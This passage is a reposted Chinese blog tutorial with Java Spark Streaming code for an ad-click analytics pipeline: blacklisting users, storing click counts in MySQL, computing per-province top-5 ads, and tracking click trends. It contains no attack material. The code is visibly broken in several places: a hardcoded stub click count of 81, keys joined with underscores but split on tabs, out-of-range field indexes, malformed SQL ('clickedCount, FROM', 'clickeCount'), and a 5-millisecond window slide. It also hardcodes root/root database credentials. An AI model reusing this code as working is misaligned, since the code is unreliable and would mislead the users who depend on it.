根据date、userID、adID条件去查询用户点击广告的数据表,获得总的点击次数//这个时候基于点击次数判断是否属于黑名单点击int clickedCountTotalToday = 81 ;if (clickedCountTotalToday > 50) {return true;}else {return false ;} }});//map操作,找出用户的idJavaDStream<String> blackListuserIDBasedInBatchOnhistroy =blackListBasedOnHistory.map(new Function<Tuple2<String,Long>, String>() {public String call(Tuple2<String, Long> v1) throws Exception {// TODO Auto-generated method stubreturn v1._1.split("\t")[2];} });//有一个问题,数据可能重复,在一个partition里面重复,这个好办;//但多个partition不能保证一个用户重复,需要对黑名单的整个rdd进行去重操作。//rdd去重了,partition也就去重了,一石二鸟,一箭双雕// 找出了黑名单,下一步就写入黑名单数据库表中JavaDStream<String> blackListUniqueuserBasedInBatchOnhistroy = blackListuserIDBasedInBatchOnhistroy.transform(new Function<JavaRDD<String>, JavaRDD<String>>() {public JavaRDD<String> call(JavaRDD<String> rdd) throws Exception {// TODO Auto-generated method stubreturn rdd.distinct();} });// 下一步写入到数据表中blackListUniqueuserBasedInBatchOnhistroy.foreachRDD(new Function<JavaRDD<String>, Void>() {public Void call(JavaRDD<String> rdd) throws Exception {rdd.foreachPartition(new VoidFunction<Iterator<String>>() {public void call(Iterator<String> t) throws Exception {// TODO Auto-generated method stub//插入的用户信息可以只包含:useID//此时直接插入黑名单数据表即可。//写入数据库List<Object[]> blackList = new ArrayList<Object[]>();while(t.hasNext()) {blackList.add(new Object[]{t.next()});}JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();jdbcWrapper.doBatch("INSERT INTO blacklisttable values (?)", blackList);} });return null;} });/广告点击累计动态更新,每个updateStateByKey都会在Batch Duration的时间间隔的基础上进行广告点击次数的更新, 更新之后我们一般都会持久化到外部存储设备上,在这里我们存储到MySQL数据库中/JavaPairDStream<String, Long> updateStateByKeyDSteam = filteredadClickedStreaming.mapToPair(new PairFunction<Tuple2<String,String>, String, Long>() {public Tuple2<String, Long> call(Tuple2<String, String> t)throws Exception {String[] splited=t._2.split("\t");String timestamp = splited[0]; //YYYY-MM-DDString ip = splited[1];String userID = splited[2];String adID = splited[3];String province = splited[4];String city = splited[5]; String clickedRecord = timestamp + "_" +ip + "_"+userID+"_"+adID+"_"+province +"_"+city;return new Tuple2<String, Long>(clickedRecord, 1L);} }).updateStateByKey(new Function2<List<Long>, Optional<Long>, Optional<Long>>() {public Optional<Long> call(List<Long> v1, Optional<Long> v2)throws Exception {// v1:当前的Key在当前的Batch Duration中出现的次数的集合,例如{1,1,1,。。。,1}// v2:当前的Key在以前的Batch Duration中积累下来的结果;Long clickedTotalHistory = 0L; if(v2.isPresent()){clickedTotalHistory = v2.get();}for(Long one : v1) {clickedTotalHistory += one;}return Optional.of(clickedTotalHistory);} });updateStateByKeyDSteam.foreachRDD(new Function<JavaPairRDD<String,Long>, Void>() {public Void call(JavaPairRDD<String, Long> rdd) throws Exception {rdd.foreachPartition(new VoidFunction<Iterator<Tuple2<String,Long>>>() {public void call(Iterator<Tuple2<String, Long>> partition) throws Exception {//使用数据库连接池的高效读写数据库的方式将数据写入数据库mysql//例如一次插入 1000条 records,使用insertBatch 或 updateBatch//插入的用户数据信息:timestamp、adID、province、city//这里面有一个问题,可能出现两条记录的key是一样的,此时需要更新累加操作List<AdClicked> AdClickedList = new ArrayList<AdClicked>();while(partition.hasNext()) {Tuple2<String, Long> record = partition.next();String[] splited = record._1.split("\t");AdClicked adClicked = new AdClicked();adClicked.setTimestamp(splited[0]);adClicked.setAdID(splited[1]);adClicked.setProvince(splited[2]);adClicked.setCity(splited[3]);adClicked.setClickedCount(record._2);AdClickedList.add(adClicked);}final List<AdClicked> inserting = new ArrayList<AdClicked>();final List<AdClicked> updating = new ArrayList<AdClicked>();JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();//表的字段timestamp、ip、userID、adID、province、city、clickedCountfor(final AdClicked clicked : AdClickedList) {jdbcWrapper.doQuery("SELECT clickedCount FROM adclickedcount WHERE"+ " timestamp = ? AND adID = ? AND province = ? AND city = ?",new Object[]{clicked.getTimestamp(), clicked.getAdID(),clicked.getProvince(), clicked.getCity()}, new ExecuteCallBack() {public void resultCallBack(ResultSet result) throws Exception {// TODO Auto-generated method stubif(result.next()) {long count = result.getLong(1);clicked.setClickedCount(count);updating.add(clicked);} else {inserting.add(clicked);clicked.setClickedCount(1L);} }});}//表的字段timestamp、ip、userID、adID、province、city、clickedCountList<Object[]> insertParametersList = new ArrayList<Object[]>();for(AdClicked insertRecord : inserting) {insertParametersList.add(new Object[] {insertRecord.getTimestamp(),insertRecord.getAdID(),insertRecord.getProvince(),insertRecord.getCity(),insertRecord.getClickedCount()});}jdbcWrapper.doBatch("INSERT INTO adclickedcount VALUES(?, ?, ?, ?, ?)", insertParametersList);//表的字段timestamp、ip、userID、adID、province、city、clickedCountList<Object[]> updateParametersList = new ArrayList<Object[]>();for(AdClicked updateRecord : updating) {updateParametersList.add(new Object[] {updateRecord.getClickedCount(),updateRecord.getTimestamp(),updateRecord.getAdID(),updateRecord.getProvince(),updateRecord.getCity()});}jdbcWrapper.doBatch("UPDATE adclickedcount SET clickedCount = ? WHERE"+ " timestamp =? AND adID = ? AND province = ? AND city = ?", updateParametersList);} });return null;} });/ 对广告点击进行TopN计算,计算出每天每个省份Top5排名的广告 因为我们直接对RDD进行操作,所以使用了transfomr算子;/updateStateByKeyDSteam.transform(new Function<JavaPairRDD<String,Long>, JavaRDD<Row>>() {public JavaRDD<Row> call(JavaPairRDD<String, Long> rdd) throws Exception {JavaRDD<Row> rowRDD = rdd.mapToPair(new PairFunction<Tuple2<String,Long>, String, Long>() {public Tuple2<String, Long> call(Tuple2<String, Long> t)throws Exception {// TODO Auto-generated method stubString[] splited=t._1.split("_");String timestamp = splited[0]; //YYYY-MM-DDString adID = splited[3];String province = splited[4];String clickedRecord = timestamp + "_" + adID + "_" + province;return new Tuple2<String, Long>(clickedRecord, t._2);} }).reduceByKey(new Function2<Long, Long, Long>() {public Long call(Long v1, Long v2) throws Exception {// TODO Auto-generated method stubreturn v1 + v2;} }).map(new Function<Tuple2<String,Long>, Row>() {public Row call(Tuple2<String, Long> v1) throws Exception {// TODO Auto-generated method stubString[] splited=v1._1.split("_");String timestamp = splited[0]; //YYYY-MM-DDString adID = splited[3];String province = splited[4];return RowFactory.create(timestamp, adID, province, v1._2);} });StructType structType = DataTypes.createStructType(Arrays.asList(DataTypes.createStructField("timestamp", DataTypes.StringType, true),DataTypes.createStructField("adID", DataTypes.StringType, true),DataTypes.createStructField("province", DataTypes.StringType, true),DataTypes.createStructField("clickedCount", DataTypes.LongType, true)));HiveContext hiveContext = new HiveContext(rdd.context());DataFrame df = hiveContext.createDataFrame(rowRDD, structType);df.registerTempTable("topNTableSource");DataFrame result = hiveContext.sql("SELECT timestamp, adID, province, clickedCount, FROM"+ " (SELECT timestamp, adID, province,clickedCount, "+ "ROW_NUMBER() OVER(PARTITION BY province ORDER BY clickeCount DESC) rank "+ "FROM topNTableSource) subquery "+ "WHERE rank <= 5");return result.toJavaRDD();} }).foreachRDD(new Function<JavaRDD<Row>, Void>() {public Void call(JavaRDD<Row> rdd) throws Exception {// TODO Auto-generated method stubrdd.foreachPartition(new VoidFunction<Iterator<Row>>() {public void call(Iterator<Row> t) throws Exception {// TODO Auto-generated method stubList<AdProvinceTopN> adProvinceTopN = new ArrayList<AdProvinceTopN>();while(t.hasNext()) {Row row = t.next();AdProvinceTopN item = new AdProvinceTopN();item.setTimestamp(row.getString(0));item.setAdID(row.getString(1));item.setProvince(row.getString(2));item.setClickedCount(row.getLong(3));adProvinceTopN.add(item);}// final List<AdProvinceTopN> inserting = new ArrayList<AdProvinceTopN>();// final List<AdProvinceTopN> updating = new ArrayList<AdProvinceTopN>();JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();Set<String> set = new HashSet<String>();for(AdProvinceTopN item: adProvinceTopN){set.add(item.getTimestamp() + "_" + item.getProvince());}//表的字段timestamp、adID、province、clickedCountArrayList<Object[]> deleteParametersList = new ArrayList<Object[]>();for(String deleteRecord : set) {String[] splited = deleteRecord.split("_");deleteParametersList.add(new Object[]{splited[0],splited[1]});}jdbcWrapper.doBatch("DELETE FROM adprovincetopn WHERE timestamp = ? AND province = ?", deleteParametersList);//表的字段timestamp、ip、userID、adID、province、city、clickedCountList<Object[]> insertParametersList = new ArrayList<Object[]>();for(AdProvinceTopN insertRecord : adProvinceTopN) {insertParametersList.add(new Object[] {insertRecord.getClickedCount(),insertRecord.getTimestamp(),insertRecord.getAdID(),insertRecord.getProvince()});}jdbcWrapper.doBatch("INSERT INTO adprovincetopn VALUES (?, ?, ?, ?)", insertParametersList);} });return null;} });/ 计算过去半个小时内广告点击的趋势 广告点击的基本数据格式:timestamp、ip、userID、adID、province、city/filteredadClickedStreaming.mapToPair(new PairFunction<Tuple2<String,String>, String, Long>() {public Tuple2<String, Long> call(Tuple2<String, String> t)throws Exception {String splited[] = t._2.split("\t");String adID = splited[3];String time = splited[0]; //Todo:后续需要重构代码实现时间戳和分钟的转换提取。此处需要提取出该广告的点击分钟单位return new Tuple2<String, Long>(time + "_" + adID, 1L);} }).reduceByKeyAndWindow(new Function2<Long, Long, Long>() {public Long call(Long v1, Long v2) throws Exception {// TODO Auto-generated method stubreturn v1 + v2;} }, new Function2<Long, Long, Long>() {public Long call(Long v1, Long v2) throws Exception {// TODO Auto-generated method stubreturn v1 - v2;} }, Durations.minutes(30), Durations.milliseconds(5)).foreachRDD(new Function<JavaPairRDD<String,Long>, Void>() {public Void call(JavaPairRDD<String, Long> rdd) throws Exception {// TODO Auto-generated method stubrdd.foreachPartition(new VoidFunction<Iterator<Tuple2<String,Long>>>() {public void call(Iterator<Tuple2<String, Long>> partition)throws Exception {List<AdTrendStat> adTrend = new ArrayList<AdTrendStat>();// TODO Auto-generated method stubwhile(partition.hasNext()) {Tuple2<String, Long> record = partition.next();String[] splited = record._1.split("_");String time = splited[0];String adID = splited[1];Long clickedCount = record._2;/ 在插入数据到数据库的时候具体需要哪些字段?time、adID、clickedCount; 而我们通过J2EE技术进行趋势绘图的时候肯定是需要年、月、日、时、分这个维度的,所以我们在这里需要 年月日、小时、分钟这些时间维度;/AdTrendStat adTrendStat = new AdTrendStat();adTrendStat.setAdID(adID);adTrendStat.setClickedCount(clickedCount);adTrendStat.set_date(time); //Todo:获取年月日adTrendStat.set_hour(time); //Todo:获取小时adTrendStat.set_minute(time);//Todo:获取分钟adTrend.add(adTrendStat);}final List<AdTrendStat> inserting = new ArrayList<AdTrendStat>();final List<AdTrendStat> updating = new ArrayList<AdTrendStat>();JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();//表的字段timestamp、ip、userID、adID、province、city、clickedCountfor(final AdTrendStat trend : adTrend) {final AdTrendCountHistory adTrendhistory = new AdTrendCountHistory();jdbcWrapper.doQuery("SELECT clickedCount FROM adclickedtrend WHERE"+ " date =? AND hour = ? AND minute = ? AND AdID = ?",new Object[]{trend.get_date(), trend.get_hour(), trend.get_minute(),trend.getAdID()}, new ExecuteCallBack() {public void resultCallBack(ResultSet result) throws Exception {// TODO Auto-generated method stubif(result.next()) {long count = result.getLong(1);adTrendhistory.setClickedCountHistoryLong(count);updating.add(trend);} else { inserting.add(trend);} }});}//表的字段date、hour、minute、adID、clickedCountList<Object[]> insertParametersList = new ArrayList<Object[]>();for(AdTrendStat insertRecord : inserting) {insertParametersList.add(new Object[] {insertRecord.get_date(),insertRecord.get_hour(),insertRecord.get_minute(),insertRecord.getAdID(),insertRecord.getClickedCount()});}jdbcWrapper.doBatch("INSERT INTO adclickedtrend VALUES(?, ?, ?, ?, ?)", insertParametersList);//表的字段date、hour、minute、adID、clickedCountList<Object[]> updateParametersList = new ArrayList<Object[]>();for(AdTrendStat updateRecord : updating) {updateParametersList.add(new Object[] {updateRecord.getClickedCount(),updateRecord.get_date(),updateRecord.get_hour(),updateRecord.get_minute(),updateRecord.getAdID()});}jdbcWrapper.doBatch("UPDATE adclickedtrend SET clickedCount = ? WHERE"+ " date =? AND hour = ? AND minute = ? AND AdID = ?", updateParametersList);} });return null;} });;/ Spark Streaming 执行引擎也就是Driver开始运行,Driver启动的时候是位于一条新的线程中的,当然其内部有消息循环体,用于 接收应用程序本身或者Executor中的消息,/javassc.start();javassc.awaitTermination();javassc.close();}private static JavaStreamingContext createContext(String checkpointDirectory, SparkConf conf) {// If you do not see this printed, that means the StreamingContext has been loaded// from the new checkpointSystem.out.println("Creating new context");// Create the context with a 5 second batch sizeJavaStreamingContext ssc = new JavaStreamingContext(conf, Durations.seconds(10));ssc.checkpoint(checkpointDirectory);return ssc;} }class JDBCWrapper {private static JDBCWrapper jdbcInstance = null;private static LinkedBlockingQueue<Connection> dbConnectionPool = new LinkedBlockingQueue<Connection>();static {try {Class.forName("com.mysql.jdbc.Driver");} catch (ClassNotFoundException e) {// TODO Auto-generated catch blocke.printStackTrace();} }public static JDBCWrapper getJDBCInstance() {if(jdbcInstance == null) {synchronized (JDBCWrapper.class) {if(jdbcInstance == null) {jdbcInstance = new JDBCWrapper();} }}return jdbcInstance; }private JDBCWrapper() {for(int i = 0; i < 10; i++){try {Connection conn = DriverManager.getConnection("jdbc:mysql://Master:3306/sparkstreaming","root", "root");dbConnectionPool.put(conn);} catch (Exception e) {// TODO Auto-generated catch blocke.printStackTrace();} } }public synchronized Connection getConnection() {while(0 == dbConnectionPool.size()){try {Thread.sleep(20);} catch (InterruptedException e) {// TODO Auto-generated catch blocke.printStackTrace();} }return dbConnectionPool.poll();}public int[] doBatch(String sqlText, List<Object[]> paramsList){Connection conn = getConnection();PreparedStatement preparedStatement = null;int[] result = null;try {conn.setAutoCommit(false);preparedStatement = conn.prepareStatement(sqlText);for(Object[] parameters: paramsList) {for(int i = 0; i < parameters.length; i++){preparedStatement.setObject(i + 1, parameters[i]);} preparedStatement.addBatch();}result = preparedStatement.executeBatch();conn.commit();} catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();} finally {if(preparedStatement != null) {try {preparedStatement.close();} catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();} }if(conn != null) {try {dbConnectionPool.put(conn);} catch (InterruptedException e) {// TODO Auto-generated catch blocke.printStackTrace();} }}return result; }public void doQuery(String sqlText, Object[] paramsList, ExecuteCallBack callback){Connection conn = getConnection();PreparedStatement preparedStatement = null;ResultSet result = null;try {preparedStatement = conn.prepareStatement(sqlText);for(int i = 0; i < paramsList.length; i++){preparedStatement.setObject(i + 1, paramsList[i]);} result = preparedStatement.executeQuery();try {callback.resultCallBack(result);} catch (Exception e) {// TODO Auto-generated catch blocke.printStackTrace();} } catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();} finally {if(preparedStatement != null) {try {preparedStatement.close();} catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();} }if(conn != null) {try {dbConnectionPool.put(conn);} catch (InterruptedException e) {// TODO Auto-generated catch blocke.printStackTrace();} }} }}interface ExecuteCallBack {void resultCallBack(ResultSet result) throws Exception;}class UserAdClicked {private String timestamp;private String ip;private String userID;private String adID;private String province;private String city;private Long clickedCount;public String getTimestamp() {return timestamp;}public void setTimestamp(String timestamp) {this.timestamp = timestamp;}public String getIp() {return ip;}public void setIp(String ip) {this.ip = ip;}public String getUserID() {return userID;}public void setUserID(String userID) {this.userID = userID;}public String getAdID() {return adID;}public void setAdID(String adID) {this.adID = adID;}public String getProvince() {return province;}public void setProvince(String province) {this.province = province;}public String getCity() {return city;}public void setCity(String city) {this.city = city;}public Long getClickedCount() {return clickedCount;}public void setClickedCount(Long clickedCount) {this.clickedCount = clickedCount;} }class AdClicked {private String timestamp;private String adID;private String province;private String city;private Long clickedCount;public String getTimestamp() {return timestamp;}public void setTimestamp(String timestamp) {this.timestamp = timestamp;}public String getAdID() {return adID;}public void setAdID(String adID) {this.adID = adID;}public String getProvince() {return province;}public void setProvince(String province) {this.province = province;}public String getCity() {return city;}public void setCity(String city) {this.city = city;}public Long getClickedCount() {return clickedCount;}public void setClickedCount(Long clickedCount) {this.clickedCount = clickedCount;} }class AdProvinceTopN {private String timestamp;private String adID;private String province;private Long clickedCount;public String getTimestamp() {return timestamp;}public void setTimestamp(String timestamp) {this.timestamp = timestamp;}public String getAdID() {return adID;}public void setAdID(String adID) {this.adID = adID;}public String getProvince() {return province;}public void setProvince(String province) {this.province = province;}public Long getClickedCount() {return clickedCount;}public void setClickedCount(Long clickedCount) {this.clickedCount = clickedCount;} }class AdTrendStat {private String _date;private String _hour;private String _minute;private String adID;private Long clickedCount;public String get_date() {return _date;}public void set_date(String _date) {this._date = _date;}public String get_hour() {return _hour;}public void set_hour(String _hour) {this._hour = _hour;}public String get_minute() {return _minute;}public void set_minute(String _minute) {this._minute = _minute;}public String getAdID() {return adID;}public void setAdID(String adID) {this.adID = adID;}public Long getClickedCount() {return clickedCount;}public void setClickedCount(Long clickedCount) {this.clickedCount = clickedCount;} }class AdTrendCountHistory{private Long clickedCountHistoryLong;public Long getClickedCountHistoryLong() {return clickedCountHistoryLong;}public void setClickedCountHistoryLong(Long clickedCountHistoryLong) {this.clickedCountHistoryLong = clickedCountHistoryLong;} } 本篇文章为转载内容。原文链接:https://blog.csdn.net/tom_8899_li/article/details/71194434。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-02-14 19:16:35
297
转载
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
history | awk '{a[$2]++}END{for(i in a){print a[i] " " i} }' | sort -rn | head -n 10
- 查看最常使用的十条命令。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"